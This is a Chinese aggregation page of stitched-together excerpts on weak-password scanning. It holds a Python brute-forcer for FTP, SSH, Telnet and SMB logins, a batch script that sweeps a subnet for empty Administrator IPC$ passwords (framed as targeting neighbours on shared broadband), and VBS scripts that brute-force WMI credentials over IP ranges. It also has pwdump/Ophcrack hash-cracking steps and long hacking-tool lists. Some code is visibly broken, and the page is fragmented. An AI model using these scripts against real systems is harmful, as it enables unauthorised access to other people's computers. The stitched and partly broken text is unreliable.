(转)Win2k命令行下自做弱口令扫描器

合集下载

Windows cmd命令中的系统安全扫描指令

Windows cmd命令中的系统安全扫描指令

Windows cmd命令中的系统安全扫描指令随着互联网的普及和信息技术的快速发展,计算机安全问题日益受到重视。

作为广泛使用的操作系统,Windows系统的安全性备受关注。

在Windows系统中,cmd命令是一种强大的工具,可以用于执行各种系统操作和管理任务。

本文将重点介绍Windows cmd命令中的一些常用的系统安全扫描指令,帮助读者了解并加强对系统安全的保护。

1. ping命令ping命令是Windows系统中常用的网络工具之一,可以用于检测网络连接和测试目标主机的可达性。

通过发送ICMP回显请求消息,并等待目标主机的回复,可以判断目标主机是否在线。

在进行系统安全扫描时,ping命令可以用于检测潜在的网络攻击目标,如扫描是否有未经授权的主机连接到本地网络。

2. netstat命令netstat命令用于显示网络连接和网络统计信息。

通过netstat命令,可以查看当前系统的网络连接状态、监听端口以及与系统建立的网络连接。

在进行系统安全扫描时,netstat命令可以帮助用户发现潜在的网络攻击活动,如异常的网络连接或监听端口。

3. tasklist命令tasklist命令用于显示当前系统中正在运行的进程列表。

通过tasklist命令,可以查看系统中所有正在运行的进程及其相关信息。

在进行系统安全扫描时,tasklist命令可以帮助用户发现潜在的恶意进程,如未知的进程或占用过高系统资源的进程。

4. ipconfig命令ipconfig命令用于显示当前系统的网络配置信息,包括IP地址、子网掩码、默认网关等。

通过ipconfig命令,可以了解系统的网络设置情况。

在进行系统安全扫描时,ipconfig命令可以帮助用户检查系统的网络配置是否正常,是否存在异常的网络设置。

5. tracert命令tracert命令用于跟踪数据包在网络中的传输路径。

通过发送一系列的ICMP回显请求消息,并记录每个节点的响应时间,可以确定数据包从源主机到目标主机的传输路径。

手把手教你打造自己的弱口令扫描工具(系统弱口令篇)

手把手教你打造自己的弱口令扫描工具(系统弱口令篇)

⼿把⼿教你打造⾃⼰的弱⼝令扫描⼯具(系统弱⼝令篇)0x01 前⾔ 在渗透测试过程中,弱⼝令检测是必要的⼀个环节,选择⼀个好⽤的弱⼝令扫描⼯具,尤为重要。

类似的弱⼝令检测⼯具如:Hydra、Hscan、X-Scan,很多时候满⾜不了⾃⼰的需求。

通过Python打造⾃⼰的弱⼝令扫描⼯具,集成在⼀起的Python脚本,在实战应⽤中,更切合实际。

0x02 FTP模块 FTP⼀般分为两种情况,匿名访问和弱⼝令,分别编写:import ftplibdef ftp_anonymous(ip,port):try:ftp = ftplib.FTP()ftp.connect(ip,port,2)ftp.login()ftp.quit()print '[+] FTP login for anonymous'except:print '[-] checking for FTP anonymous fail'def ftp_login(ip,port,user,pwd):try:ftp = ftplib.FTP()ftp.connect(ip,port,2)ftp.login(user,pwd)ftp.quit()print '[+] FTP weak password: '+user,pwdexcept:print '[-] checking for '+user,pwd+' fail'0x03 SSH模块import paramikodef ssh_login(ip,port,user,pwd):try:ssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())ssh.connect(ip,port,user,pwd,timeout=5)print '[+] SSH weak password: '+user,pwdssh.close()except:print '[-] checking for '+user,pwd+' fail'0x04 Telnet模块import telnetlibdef telnet(ip,port=23): try: tn = telnetlib.Telnet(ip,timeout=5) tn.set_debuglevel(0) tn.read_until("login: ") tn.write(user + '\r\n') tn.read_until("assword: ") tn.write(pwd + '\r\n') result = tn.read_some() result = result+tn.read_some() if result.find('Login Fail')>0 or result.find('incorrect')>0: print "[-] Checking for "+user,pwd+" fail" else: print "[+] Success login for "+user,pwd tn.close() except: print '[-] Something Error'+username,password+" fail" 0x05 ipc$模块from impacket import smbdef smb_login(ip,port,user,pwd):try:client = smb.SMB('*SMBSERVER',ip)client.login(user,pwd)flag ='[+] IPC$ weak password: '+user,pwdexcept:print '[-] checking for '+user,pwd+' fail'。

超级弱口令工具使用手册

超级弱口令工具使用手册

超级弱口令工具使用手册一、简介超级弱口令工具是一款用于测试系统密码安全性的工具,通过自动化方式快速检测系统中存在的弱口令,帮助系统管理员发现潜在的安全隐患。

本手册将详细介绍超级弱口令工具的安装、配置和使用方法,帮助用户更好地利用该工具进行密码安全性检测。

二、安装1. 下载超级弱口令工具安装包,解压缩至指定目录。

2. 打开命令行界面,切换至超级弱口令工具的安装目录。

3. 运行安装脚本,按照提示完成安装过程。

4. 安装完成后,验证是否成功安装,命令行输入"weakpwdtool --version",显示版本信息即表示安装成功。

三、配置1. 打开超级弱口令工具所在目录,找到配置文件config.ini。

2. 使用文本编辑器打开config.ini文件,根据实际需求修改配置项,如设置要检测的主机IP、端口范围等。

3. 保存文件并退出。

四、使用1. 在命令行界面输入"weakpwdtool -i 主机IP -p 端口范围",开始执行密码强度检测。

2. 检测完成后,工具会生成报告文件report.txt,用户可查看具体的检测结果和建议。

3. 根据报告中的提示,及时修复发现的弱口令问题。

五、注意事项1. 在使用超级弱口令工具进行密码强度检测时,应事先获得系统合法授权,确保操作符合法规和相关政策。

2. 避免在生产环境下直接使用工具进行检测,建议在测试环境中进行操作,以免影响正常业务。

3. 定期更新超级弱口令工具版本,保持工具的功能和性能处于最佳状态。

4. 在使用过程中如遇到问题,可参考工具官方文档或者查阅相关技术资料,也可寻求专业人士的帮助和支持。

六、总结超级弱口令工具是一款简单易用且功能强大的密码安全性检测工具,通过本手册的介绍,用户可以轻松掌握该工具的安装、配置和使用方法,发现并解决系统中可能存在的弱口令问题,提升系统的安全性。

希望用户能够充分利用超级弱口令工具,为系统的安全运行贡献自己的一份力量。

用批处理命令也能当“黑客”——自编批处理破解弱口令

用批处理命令也能当“黑客”——自编批处理破解弱口令
二、弱口令猜测的主要武器——net命令
用于弱口令扫描的主要命令是net,这里使用到的主要是use参数,具体用法如下:
net use 机器名\共享目录 "密码" /user:"用户名"
例如我们想以用户zzy,密码123,连接到192.168.0.1服务器的共享目录soft,使用的命令是:
net use \\192.168.0.1\soft "123" /user:"zzy"
一旦连接成功,会得到“命令成功完成”的提示。
在这里我们需要用administrator的空口令去连接服务器的IPC$服务,所以命令格式应该是: net use \\192.168.0.1\ipc$ "" /user:"administrator"
如果我们得到的是“命令成功完成”的提示,就表示192.168.0.1这台服务器的管理员没有设置口令。
@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G\ipc$ "" /use:"Administrator" | find "命令成功完成" >>test.txt
五、如何防范
事实上,这个批处理文件在实际应用中,对Windows NT和Windows 2000的效果往往不好,因为两个系统在安装过程中会以非常显眼的方式强制用户输入Administrator密码。但是对于Windows XP来说,Administrator密码不是必须的,对于习惯了安装软件一路“下一步”的用户来说,往往会忽略设置Administrator密码。对于小区宽带用户来说,只要很短的时间就可以把附近的用户扫描一遍。可以说,Windows XP的缺陷加上共享的小区宽带,使得我们这个非常简陋的批处理也能取得良好的效果。

超级弱口令工具使用手册

超级弱口令工具使用手册

超级弱口令工具使用手册摘要:1.超级弱口令工具的定义和作用2.超级弱口令工具的使用方法3.使用超级弱口令工具的注意事项4.超级弱口令工具的优缺点分析5.总结正文:【1.超级弱口令工具的定义和作用】超级弱口令工具是一款用于测试和破解弱口令的软件工具,主要针对一些安全性较弱的账户密码进行测试和破解。

它的出现,可以帮助用户及时发现并修复账户的安全隐患,从而保护用户的信息安全。

【2.超级弱口令工具的使用方法】使用超级弱口令工具的具体步骤如下:(1)打开超级弱口令工具,选择需要测试的账户类型,如邮箱、社交媒体等;(2)输入需要测试的账户和密码,或者直接输入已知的弱口令;(3)点击“测试”按钮,工具将开始对账户密码进行测试;(4)测试完成后,根据测试结果,修改并强化账户的密码。

【3.使用超级弱口令工具的注意事项】(1)使用超级弱口令工具时,请确保自己的行为符合相关法律法规,不要用于非法目的;(2)在测试他人账户时,请先征得对方同意,以免引发纠纷;(3)测试过程中,请注意保护个人隐私,不要泄露自己的和他人的敏感信息。

【4.超级弱口令工具的优缺点分析】优点:(1)操作简单,容易上手;(2)能够快速发现并修复账户的安全隐患;(3)可以帮助用户提高账户的安全性。

缺点:(1)可能会被不法分子用于非法目的;(2)测试结果可能受到一些因素的影响,如账户类型、密码长度等。

【5.总结】超级弱口令工具作为一款测试和破解弱口令的软件工具,可以帮助用户及时发现并修复账户的安全隐患,提高账户的安全性。

然而,使用过程中需要注意遵守相关法律法规,不要用于非法目的。

黑客工具名称大全

黑客工具名称大全
cusrmgr 命令行下的一个用户管理工具
whoami 了解自己的身份
Smbcrack 帐号破解工具
Wmicracker 基于WMI服务进行帐号破解工具(不需要ipc)
dvbbsbrute.exe 破解md5密码
L0phtcrack
passdump 将NT和2000处于登录状态的蠢猪密码从内存中解密的小工具,一般为: C:\WINNT\PASSdump.TXT
sqlexec mssql连接器 mysql.rar mysql连接器
SQLServerSniffer.exe mssql密码嗅探
SQLTools.rar mssql工具包
Opentelnet 启动远程服务器的Telnet的
Psexec
Nc
Letmein
Ntlm 取消telnet身份验证
RemoteNC.exe 远程执行命令
SC.exe 命令行的远程服务管理软件
Wget 下载工具
Xftp fห้องสมุดไป่ตู้p下载工具
Petite 加壳软件
rar 命令行下的winrar
reboot 重启主机
shed 共享资源扫描器
sharecrack 破解共享密码
skserver snake的代理跳板,做sock5代理的工具
dpps.exe 端口扫描工具
fscan superscan命令行版本
dumpwin 查看系统信息
cmdinfo.exe获得本地或远程NT/2K主机的信息
SocksCap.rar
fpipe 端口重定向
hbulot 安装终端服务
hfind 扫描ipc弱口令

超级弱口令工具使用手册

超级弱口令工具使用手册

超级弱口令工具使用手册超级弱口令工具是一款专为网络安全人员开发的辅助工具,旨在帮助发现和修复弱口令漏洞。

以下是该工具的使用手册:1. 下载和安装超级弱口令工具首先,从官方网站下载超级弱口令工具的安装包。

安装包提供了适用于各种操作系统的版本。

按照提示安装工具。

2. 打开超级弱口令工具双击桌面上的超级弱口令工具图标或从开始菜单中找到工具并打开。

3. 添加目标在工具界面中找到添加目标的选项。

点击该选项,并输入目标的IP地址或域名。

你还可以指定端口号,如有需要。

4. 选择弱口令字典超级弱口令工具依赖于弱口令字典来尝试破解密码。

选择一个适合的字典文件,可以使用自带的字典或添加自定义的字典。

5. 启动扫描在工具界面中点击开始扫描或类似按钮,启动口令破解过程。

工具将自动使用所选字典中的密码尝试进行破解。

6. 查看扫描结果扫描完成后,工具将显示破解成功的弱口令和相关的目标信息。

你可以使用这些信息来补强你的系统安全。

7. 导出结果如果需要将扫描结果保存到本地,可以使用导出功能。

通常,超级弱口令工具支持将结果导出为文本文件或Excel格式。

8. 更新字典此工具的强大之处在于使用最新的弱口令字典。

定期更新字典以提高工具的破解能力。

9. 注意事项在使用超级弱口令工具时,需要注意以下几点:- 仅限用于合法的安全测试目的,获得授权后使用。

- 在扫描之前,请确保你拥有合法的权限。

- 避免在生产环境中使用该工具,以避免意外破坏。

使用超级弱口令工具可以帮助网络安全人员主动发现和修复弱口令漏洞,提高系统的安全性。

但请记住,使用工具时需要遵守法律和道德准则。

明鉴WEB应用弱点扫描器用户手册

明鉴WEB应用弱点扫描器用户手册

4.1.6. 表单配置.........................................................................................................16
4.1.7. Web 检测配置.................................................................................................17 4.1.8. 扫描策略配置.................................................................................................19 4.2. 系统配置管理.............................................................................................................20
4.8.3. XSS .................................................................................................................32 4.8.4. 表单隐藏域.....................................................................................................32
4.6. SSL 转发器.................................................................................................................29

Windows弱口令检查工具和方法

Windows弱口令检查工具和方法

Windows弱口令检查工具和方法在网络安全领域中,弱口令是指密码强度较低,容易被猜解或者暴力破解的密码。

对于Windows系统来说,弱口令可能会导致未经授权的用户访问系统,进而造成数据泄露、系统瘫痪等严重后果。

因此,及时检测和修复弱口令是保障系统安全的重要步骤。

本文将介绍一些常用的Windows弱口令检查工具和方法,帮助管理员及时发现和解决弱密码风险。

一、常用的Windows弱口令检查工具1. Hydra:Hydra是一个功能强大的密码破解工具,可用于检查Windows系统弱口令。

它支持多种协议和服务,包括SMB、FTP、Telnet等,在很短的时间内可以尝试大量的用户名和密码进行破解。

Hydra的使用非常灵活,可以通过配置文件指定破解规则和密码字典,也可以通过命令行参数选择破解目标和方法。

2. Medusa:Medusa是另一个用于弱口令检查的工具,它也支持多种网络服务和协议,包括Telnet、SSH、FTP等。

Medusa的特点是高效稳定,在破解过程中会采用多种技术,如暴力破解、字典攻击、组合攻击等,以提高破解成功的几率。

Medusa的配置文件和命令行参数也非常详细,可根据需要进行定制。

3. Nmap:Nmap原本是一款网络扫描工具,但它也可以用于弱口令检查。

通过使用Nmap的Ncrack模块,可以对目标系统进行弱口令破解。

Ncrack支持多种协议和服务,包括SSH、RDP、VNC等。

Nmap强大的脚本引擎可用于编写自定义脚本,实现更高级的弱口令破解功能。

4. Metasploit:Metasploit是一款功能强大的渗透测试工具,它内置了很多模块用于检查和利用安全漏洞。

其中,auxiliary模块中的scanner和auth模块可以用于弱口令检查。

Metasploit的优点是操作简便,可使用图形界面或命令行进行配置和执行,也支持多种目标和方法。

二、Windows弱口令检查方法1.弱口令字典攻击:字典攻击是一种常见的弱口令检查方法,它通过尝试常用的用户名和密码组合进行破解。

批处理 破解win 显示win 的弱口令

批处理 破解win 显示win 的弱口令
事实上,当微软从win2k开始将命令行增强后,借鉴了相当多unix的优,虽然还不至于像unix那么灵活,但可以实现的功能已相当之多。
写本文是希望起到介绍和抛砖引玉的效果。所以没有实验更多功能,故给出几点说明:
1.不能对指定网段扫描。
2.此扫描原理是用帐号和密码循环建立ipc$连接,因此如果对方没开139端口或者删除了ipc$共享,那就不能工作了,呵呵。
将下面内容存为ipc.bat:
net use \%1ipc$ %2 /user:"%3"
goto result%ERRORLEVEL%
:result0
echo Remote Server:%1 >>%4
echo Username:%3 >>%4
echo Password:%2 >>%4
现在是不是有点对user.txt中的用户暴力跑ipc获得密码的味道啊?呵呵。我用这个简单弱口令扫描器挂了一个xkey做的字典扫一台有八个用户的win2k server,还真扫出了两个密码!而且速度很快!
好了,在Win2k命令行下简单做弱口令扫描器的方法就先介绍到这里,可能还有许多种更简单的方法能实现相同的功能,你可以去尝试一下。
先提醒一下,在批处理文件中使用 FOR 命令时,指定变量使用 %%variable,而不是%variable。
将下面内容存为scan.bat:
@echo off
echo Written By ypy >>%4
echo Email:ypy_811@ >>%4
exit
将下面内容存为ipc.bat:
net use \%1ipc$ %2 /user:"%3"

超级弱口令工具使用手册

超级弱口令工具使用手册

超级弱口令工具使用手册摘要:一、前言二、超级弱口令工具介绍1.工具背景2.功能概述三、超级弱口令工具使用说明1.安装与配置2.弱口令扫描3.结果分析与处理四、超级弱口令工具高级功能1.字典攻击2.暴力破解3.扫描策略设置五、安全建议与防范措施1.强密码策略2.定期更新口令3.网络安全意识培养六、结语正文:【前言】超级弱口令工具是网络安全领域的一款重要工具,用于检测系统中存在的弱口令,以提高系统的安全性。

本文将详细介绍超级弱口令工具的使用方法及注意事项。

【超级弱口令工具介绍】【功能概述】超级弱口令工具是一款强大的弱口令检测工具,支持多种扫描方式和扫描结果分析,能够帮助用户快速定位和解决系统中的弱口令问题。

【超级弱口令工具使用说明】【安装与配置】超级弱口令工具的安装过程简单,用户只需按照官方文档的指导进行操作即可。

在安装完成后,用户需要对工具进行配置,包括设置扫描目标、扫描范围等。

【弱口令扫描】在配置完成后,用户可以启动弱口令扫描功能。

工具会自动对指定的目标进行扫描,找出存在弱口令的账户。

【结果分析与处理】扫描完成后,用户可以通过工具提供的界面查看扫描结果,包括弱口令的详细信息。

用户可以根据这些信息,及时修改存在风险的口令,提高系统的安全性。

【超级弱口令工具高级功能】【字典攻击】字典攻击是超级弱口令工具的一种高级功能,可以针对指定的用户和口令进行批量猜测。

这种方法在一定情况下能够提高破解速度。

【暴力破解】暴力破解是另一种高级功能,通过不断尝试所有可能的口令组合,找出正确的口令。

这种方法需要较长时间,但在某些情况下可能有效。

【扫描策略设置】超级弱口令工具还提供了扫描策略设置功能,用户可以根据实际需求,自定义扫描参数,提高扫描效率。

【安全建议与防范措施】【强密码策略】针对弱口令问题,用户应当实施强密码策略,要求用户使用包含大小写字母、数字和特殊字符的复杂密码,提高口令的安全性。

【定期更新口令】用户应定期更新口令,避免长时间使用相同的口令,增加系统安全风险。

Windows 弱口令检查工具和方法

Windows 弱口令检查工具和方法

Window系统弱口令检查办法工具介绍:OPhcrack:官网网址:最常用的,界面友好,与众不同,压缩储存,有自己独特的彩虹表结构,还有Live CD。

支持的HASH类型:LM,NTLM高级的表要花钱买,免费的表有(推荐只下2和5,要求高的可以下载3和5):1.XP free(LM表:包含大小写+数字)380MB(官网免费下载)2.XP free fast(和前一个一样,但是速度更快)703MB(官网免费下载)3.XP special(LM表:大小写+数字+所有符号包括空格)7.5G4.Vista free (NTLM表:包含常用密码)461MB(官网免费下载)5.Vista special(NTLM表:包含6位的全部可打印字符,7位的大小写字母数字,8位的小写和数字)8G新版本的ophcrack 3.6版本的表格不止上面的8个,但是上面这些表格也基本够用用作弱口令检查。

第一步:获取Hash值在安装好ophcrack软件之后,在其安装目录下面有pwdump,可以直接运行这软件获取系统的Hash值。

1.打开cmd命令行,cd到pwdump的目录,运行命令:pwdump 127.0.0.12.运行上面的命令,可以获取系统所有用户的LM和NTLM的Hash值,我们可以利用重定向的办法将运行的结果输出到一个文件如:pwdump 127.0.0.1 >1.txt3.可以将这个pwdump目录的文件,复制到需要进行弱口令检查的目标服务器上,获取了hash之后,在将hash文件取回本地。

第二步:利用ophcrack破解密码1.安装安装向导安装ophcrack软件。

2.下载彩虹表,针对服务器的系统多为window 2003 server和window 2008 server,只需要下载彩虹表XP free fast和Vista free3.将彩虹表安装到ophcrack的table中。

点击install之后,找到下载表的存放目录。

135端口扫弱口令的vbs((效率低下))脚本安全电脑资料

135端口扫弱口令的vbs((效率低下))脚本安全电脑资料

135端口扫弱口令的vbs((效率低下))脚本平安电脑资料By:LcxOn Error Resume Nextset fso=CreateObject("Scripting.FileSystemObject") Function filenumshow(filename,i)Dim temparrayif not fso.fileExists(filename) then exit Functionset f = fso.opentextfile(filename,1)if not f.AtEndofStream thentempt = f.readalltemparray = split(tempt,chr(13)&chr(10))filenumshow=temparray(i)f.closeEnd ifEnd FunctionFunction filenum(filename)Dim temparrayif not fso.fileExists(filename) then exit Functionset f = fso.opentextfile(filename,1)if not f.AtEndofStream thentempt = f.readalltemparray = split(tempt,chr(13)&chr(10))lineNum=ubound(temparray)filenum=lineNumf.closeEnd ifEnd FunctionFor i=0 To filenum("c:\user.txt")user=filenumshow("c:\user.txt",i)If user="" Then Exit forFor l=0 To filenum("c:\pass.txt")pass=filenumshow("c:\pass.txt",l)wscript.echo user&Space(5)&passCall Scan("192.168.8.10",user,pass,"c:\log.txt")If Err.number=0 Thenwscript.echo "find!!!"Exit ForEnd ifwscript.echoErr.number&Space(10)&Err.source&Space(10)&Err.Description Err.clearnextNextSub Scan(ipaddress,username,password,report)set bjlocator=createobject("wbemscripting.swbemlocator") setbjswbemservices=objlocator.connectserver(ipaddress,"root/ci mv2",username,password)Set colItems = objswbemservices.ExecQuery("Select * From Win32OperatingSystem")with fso.opentextfile(report,8,true).writeline"==================================================="For Each objItem in ColItems.writeline ipaddress & ": " & objItem.CaptionNext.writeline "username:"&username.writeline "password:"&password.writeline"===================================================".closeend withend Subset fso=nothing++++++++++++++++++++++++++++++++++++++++++++++++++++++ Enjoy Peration Testingon error resume nextif (lcase(right(wscript.fullname,11))="wscript.exe") then wscript.echo "Execute it under the cmd.exe Plz! Thx." wscript.quitend ifif wscript.arguments.count<5 Thenwscript.echo "RPCScan.vbs"wscript.echo "Code by NetPatch(.icehack.) 07.7.5"wscript.echo "Thx KVO,Lcx"wscript.echo "use: cscript. "&wscript.scriptfullname&" BeginIp EndIp Userdic Passdic ReportPath"wscript.quitend ifBeginIP=wscript.arguments(0)EndIP=wscript.arguments(1)UserDic=wscript.arguments(2)PassDic=wscript.arguments(3)ReportPath=wscript.arguments(4)SIp = Split(BeginIp, ".", -1, 1)EIp =Split(EndIp, ".", -1, 1)If SIp(0) = EIp(0) And SIp(1) = EIp(1) And SIp(2) = EIp(2) And CInt(SIp(3)) <= CInt(EIp(3)) And CInt(EIp(3)) < 255 ThenSEIp=SIp(0)&"."&SIp(1)&"."&SIp(2)Set bjPings =GetObject("winmgmts:{impersonationLevel=impersonate}")set bjlocator=createobject("wbemscripting.swbemlocator") For num=CInt(SIp(3)) To CInt(EIp(3))aMachines = SEIp&"."&numSet bjPing=objPings.ExecQuery("select * from Win32PingStatus where address = '" & aMachines & "'")For Each objStatus in objPingIf IsNull(objStatus.StatusCode) or objStatus.StatusCode = 0 ThenIf userdic <> "" Or passdic <> "" Thenset fso=CreateObject("Scripting.FileSystemObject")Set file=fso.opentextfile(UserDic,1,false)k=falsedo while file.atendofline <> Trueuserdic=file.readlineSet files=fso.opentextfile(PassDic,1,false)do while files.atendofline <> Truepassdic=files.readlinewscript.echo "Coning "&aMachines&"...."wscript.echo "user:"&userdicwscript.echo "pass:"&passdiccall Scan(aMachines,UserDic,PassDic,ReportPath)If Err.Number = 0 Then Exit DoErr.clearLoopfiles.closeLoopfile.closeset fso=nothingEnd IfElseWScript.Echo(aMachines & " is not reachable")End IfNextNextEnd ifSub Scan(ipaddress,username,password,report)setbjWservices=objlocator.connectserver(ipaddress,"root/cimv2" ,username,password)Set colItems = objWservices.ExecQuery("Select * From Win32OperatingSystem")with fso.opentextfile(report,8,true).writeline"==================================================="For Each objItem in ColItems.writeline ipaddress & ": " & objItem.CaptionNext.writeline "username:"&username.writeline "password:"&password.writeline"===================================================".closeend withend sub用法:cscript. RPCScan.vbs BeginIp EndIp Userdic Passdic ReportPathBeginIp //开场IPEndIp //完毕IPUserdic//用户列表Passdic//密码档ReportPath//输出途径利用RPC(135端口进展密码猜解)//浸透时比较好使.。

超级弱口令工具使用手册

超级弱口令工具使用手册

超级弱口令工具使用手册摘要:一、超级弱口令工具简介二、超级弱口令工具使用方法1.安装与运行2.界面介绍3.功能详解4.操作实例三、超级弱口令工具的优势四、常见问题与解决方案五、总结与建议正文:【一、超级弱口令工具简介】超级弱口令工具是一款专门用于破解弱口令的软件,它可以帮助用户轻松地识别和攻击弱口令,提高网络安全风险。

本手册将详细介绍如何使用这款工具,以便用户更好地掌握其功能和优势。

【二、超级弱口令工具使用方法】1.安装与运行在使用超级弱口令工具之前,请确保已安装Python环境。

用户可以访问官方网站下载安装包,并根据提示进行安装。

安装完成后,通过命令行或终端运行超级弱口令工具。

2.界面介绍超级弱口令工具的界面简洁直观,主要包括以下几个部分:(1)域名输入框:用于输入目标域名或IP地址。

(2)用户名输入框:用于输入目标网站的用户名。

(3)密码长度选择:用户可以设置密码的长度,支持1-64位。

(4)弱口令字典:提供多种弱口令字典供用户选择,包括默认字典、自定义字典等。

(5)攻击模式选择:提供多种攻击模式,如暴力破解、字典攻击、组合攻击等。

(6)开始攻击按钮:点击开始攻击,工具将自动进行破解。

3.功能详解(1)暴力破解:根据用户设定的密码长度,尝试所有可能的组合。

(2)字典攻击:使用指定的弱口令字典进行攻击,识别出符合字典规律的密码。

(3)组合攻击:将用户名与密码长度相结合,生成更多可能的密码组合。

4.操作实例以暴力破解为例,用户输入目标域名、用户名和密码长度,选择暴力破解模式,点击开始攻击按钮。

超级弱口令工具将自动破解目标网站的弱口令,并在破解成功后弹出提示。

【三、超级弱口令工具的优势】1.强大的攻击能力:支持多种攻击模式,提高破解成功率。

2.丰富的字典资源:提供多种弱口令字典,满足不同需求。

3.智能化识别:根据用户输入的信息,智能地调整攻击策略。

4.易于使用:界面简洁,操作便捷,无需专业技能即可上手。

超级弱口令工具使用手册

超级弱口令工具使用手册

超级弱口令工具使用手册摘要:一、前言二、超级弱口令工具介绍1.工具背景2.功能概述三、超级弱口令工具使用说明1.安装与配置2.弱口令扫描3.弱口令破解4.结果分析与报告四、注意事项1.合法合规使用2.防范安全风险五、结语正文:【前言】超级弱口令工具是一款用于检测和破解弱口令的软件,本手册旨在为用户提供一个详细的操作指南。

在阅读本手册之前,请确保您已充分了解网络安全法规,并确保您的行为符合相关法律法规。

【超级弱口令工具介绍】【工具背景】超级弱口令工具是一款基于Python语言开发的,用于检测和破解弱口令的软件。

该工具具有较高的检测速度和破解效率,广泛应用于网络安全工程师、渗透测试工程师以及系统管理员等场景。

【功能概述】超级弱口令工具主要包括以下功能:1.弱口令扫描:支持多种扫描方式,如字典扫描、暴力扫描等,可自定义扫描参数,提高扫描效率。

2.弱口令破解:提供多种破解算法,如彩虹表破解、暴力破解等,支持多线程、代理IP等功能,提高破解成功率。

3.结果分析与报告:扫描和破解完成后,工具会生成详细的报告,包括弱口令信息、破解结果等,方便用户进行分析。

【超级弱口令工具使用说明】【安装与配置】1.首先,确保您的计算机已安装Python环境,然后通过pip命令安装超级弱口令工具。

2.安装完成后,设置工具的相关配置,如破解限制、代理IP等。

【弱口令扫描】1.选择扫描目标,如单个IP、子网、端口等。

2.选择扫描方式,如字典扫描、暴力扫描等。

3.设置扫描参数,如扫描线程数、扫描时间等。

4.开始扫描。

【弱口令破解】1.导入扫描结果,包括弱口令和相关信息。

2.选择破解算法,如彩虹表破解、暴力破解等。

3.设置破解参数,如破解线程数、破解时间等。

4.开始破解。

【结果分析与报告】1.查看破解结果,分析弱口令情况。

2.生成报告,包括弱口令信息、破解结果等。

【注意事项】【合法合规使用】1.使用超级弱口令工具进行渗透测试时,请确保您拥有相应的授权,遵守相关法律法规。

网站漏洞扫描工具

网站漏洞扫描工具

偶尔在网上看到这些,拿来和大家一块看看,也好让各个站长懂得保护自己的网站。

网站漏洞扫描工具Shadow Security Scanner v 网络入侵机_V2.0 波尔远程控制V6.32 VIP破解版superscan4.0扫描器HttpsMimTools nohackasp木马生成器拿站和思路Oracle_专用注射器远程控制软件ntshell v1.0(开源挖掘鸡4.02 Willcome急速批量抓鸡全能PcShare远程控制软件多功能S扫描器php168漏洞利用工具中华经典网络军刀NC小马上线及绑困和抓鸡iebho攻击程序终极Rootkit超详细讲解鸽子上线QQEAMIL攻击器PHP木马修改增强版金豹多顶下载者framework-2.6-snapshot 提权工具集EditPlus v2.31 Buil最新过XP2网马剑煞BetaV7.6.8扫描端口V2.0X-way扫描器SpyNet Sniffer网站猎手2.0X-Scan-v3.3流光5.0黑客基地专用破解版NBSI网站漏洞检测工具明小子旁注工具3.5端口过滤扫描器mysql_pwd_crackAdvanced IP Scanner v1.5IPScanner扫描软件THC-Amap v5.0php注入辅助工具:phpsendPackInter,sniffer工具含源代码X-Scan-v3.2-cnX-Scan-v3.2-beta版超级扫描工具:nmap-3.81-win32流光5.0 时间限制破解Domain3.2正式版(5.2修正)sql扫描加自动攻击工具:SqlpokeTHC-Amap v4.8mysql字段扫描:numscan第一款php漏洞扫描器:rpvsOscanner端口扫描器红魂专用版atk-3.1金山毒霸可疑文件扫描工具v2.01GUI界面的WED和WIS综合工具超强adsl破解器俄罗斯专业扫描工具SSS6.67.58破解版Attack Toolkit 3.0Roman ADSL帐号扫描工具升级版针对广东电信漏洞的扫描工具IPv4和IPv6通用扫描工具:scan6adsl帐号扫描工具+动画MS Webserver 漏洞扫描器网络主机扫描(HostScan)T-PsKitRetina Network Security Scanner WildPackets ProCovertAngry IP Scannerwlan无线网络诊断/WildPackets AiroPe APort铁血扫描器无处藏身(Seekyou)nScanSQL Injection测试工具FloodScanrpcscan信息扫描工具优秀的ShadowScan经典扫描程序AmapSuperscan漏洞扫描Nessusipc批处理扫描工具Angry IP Scanner 汉化版强大的漏洞扫描NessusWX WindowsNT/2000自动攻击探测机网络黑客控制中心使用教程+工具扫描工具SuperScan4NMap最新版本:nmap-3.70-win32 Retina DCOM ScannerSQLScan很好的扫描工具NetScanToolsipc扫描工具scanipc非常有名的扫描工具X-way流光for win98/ME最好的ipc$扫描essential nettools不错的扫描工具easyscan鼎鼎大名的扫描工具流光大范围网段快速ipc$猜解机ipscanN.E.W.T.网络扫描器端口扫描A Complete Subnet Scanner 自动攻击探测机扫描工具:VsanIIS漏洞扫描Easyscan高速端口扫描Bluesportscanner扫描工具X-port最好的扫描器:X-SAN 3.0 beta扫描工具:STAT Scanner Pro阿拉丁扫描器小巧的黑客工具:NBTScan非常优秀的扫描工具X-scan 2.3扫描工具IPScanner扫描工具Dsns著名的且功能强大的WEB扫描工具Wnikto32 小巧的端口扫描NetBurn扫描工具GFI LANguard Scanner不错的扫描工具:Scan中华经典网络军刀优秀的扫描工具Nmap命令行版本多线程扫描XPortScan专业的扫描工具Shadow Security Scanner ASP漏洞集扫描工具Retina Network Security Scann快速端口扫描Shadowscan优秀的WEB扫描工具Nikto扫描Shadow Security Scanner v6.6.41 SuperScan V4.0汉化版极为优秀的Shadow Security Scanner基于命令行下的RPC扫描器多线程扫描SinScan局域网扫描大师V1.0推荐:免费短信发送工具IP端口扫描软件最新漏洞扫描器MS05051Scan推荐:图形界面的NMAP扫描器dcomrpc漏洞X-Scan23插件啊D网络工具包2.专用免杀版极速漏洞扫描攻击器[升级版]猎手-旁注工具黑客基地专用极速漏洞扫描器X-Scan v3.3超强扫描器:NMAP 3.90IP地址扫描器地址分类搜索机多线程后台扫描器超强扫描器superscan4.0nmap-3.81源代码(Linux平台)nmap-3.81源代码(FreeBSD平台)X-Scan-v3.3mysql弱口令扫描工具:mysqlweak DFind_v0.83扫描工具MySql Weak Pass ScannerCain & Abel v2.68 for Win阿D工具包2.01HScan v1.20动网大扫描多线程网站后台扫描工具MS06040漏洞扫描器挖掘鸡v3.5BluesPortScan超快的端口扫描工具动网大扫描1.0测试版啊D网络工具包2.1免杀版sql注入中文转换器明小子Domain3.6guastbook漏洞利用德国的SQL注射工具流光FluXay 5 闪亮发布!注入攻击综合软件包BBSXP论坛漏洞完全注射工具MS06007漏洞扫描器高速扫描:风雪端口扫描器动易2005 